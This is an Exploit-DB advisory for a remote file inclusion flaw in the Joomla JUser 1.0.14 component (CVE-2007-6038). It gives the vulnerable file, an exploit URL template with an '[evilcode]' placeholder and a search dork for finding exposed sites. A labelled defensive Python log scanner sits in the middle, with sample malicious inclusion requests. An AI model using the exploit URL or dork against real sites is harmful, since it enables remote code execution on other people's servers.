Joomla Component JUser 1.0.14 - Remote File Inclusion Vulnerability

2007-11-19T00:00:00
ID EDB-ID:4636
Type exploitdb
Reporter NoGe
Modified 2007-11-19T00:00:00

Description

Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability. CVE-2007-6038. Webapps exploit for the PHP platform.

                                        
                                            ==================================================================================================================================

# JUser Joomla Component 1.0.14 Remote File Include Vulnerability

    Component     : com_juser version 1.0.14 - paid component
    Vendor        : www.joomlaequipment.com
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com
  
==================================================================================================================================

# Vulnerable file
  
    /administrator/components/com_juser/xajax_functions.php

    line 4: require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');



# Exploit

    http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]
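
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access-log lines for requests that set mosConfig_absolute_path in the query string, a server-side path variable that a client has no reason to supply. The log lines, the example.invalid host and the scan() helper are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Nov/2007:10:00:01 +0000] "GET /index.php?option=com_juser&task=list HTTP/1.1" 200 5120
192.0.2.44 - - [19/Nov/2007:10:00:07 +0000] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://example.invalid/x.txt? HTTP/1.1" 200 312
192.0.2.44 - - [19/Nov/2007:10:00:09 +0000] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=%68ttp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.0" 200 0
192.0.2.51 - - [19/Nov/2007:10:01:30 +0000] "POST /administrator/index2.php HTTP/1.1" 200 2048
192.0.2.60 - - [19/Nov/2007:10:02:00 +0000] "GET /administrator/components/com_juser/xajax_functions.php HTTP/1.1" 200 0
"""

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Value begins with a URL or stream-wrapper scheme (checked after URL-decoding).
WRAPPER = re.compile(r'^\s*(?:https?|ftps?|php|data):', re.I)
PARAM = "mosConfig_absolute_path"

def scan(log_text):
    """Return one finding per request that supplies PARAM in its query string."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        # parse_qsl percent-decodes, so encoded variants are normalised first.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.split("[", 1)[0] != PARAM:   # also matches the PARAM[] form
                continue
            findings.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "path": path,
                "value": value,
                # A remote scheme points at an inclusion attempt; any other
                # client-supplied value is still worth review.
                "severity": "high" if WRAPPER.match(value) else "medium",
            })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"], f["client"], f["path"], repr(f["value"]))
```

Access logs record only the query string, so this covers the GET form shown in the advisory.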



# D0rk

    inurl:com_juser

==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq
    http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-11-19]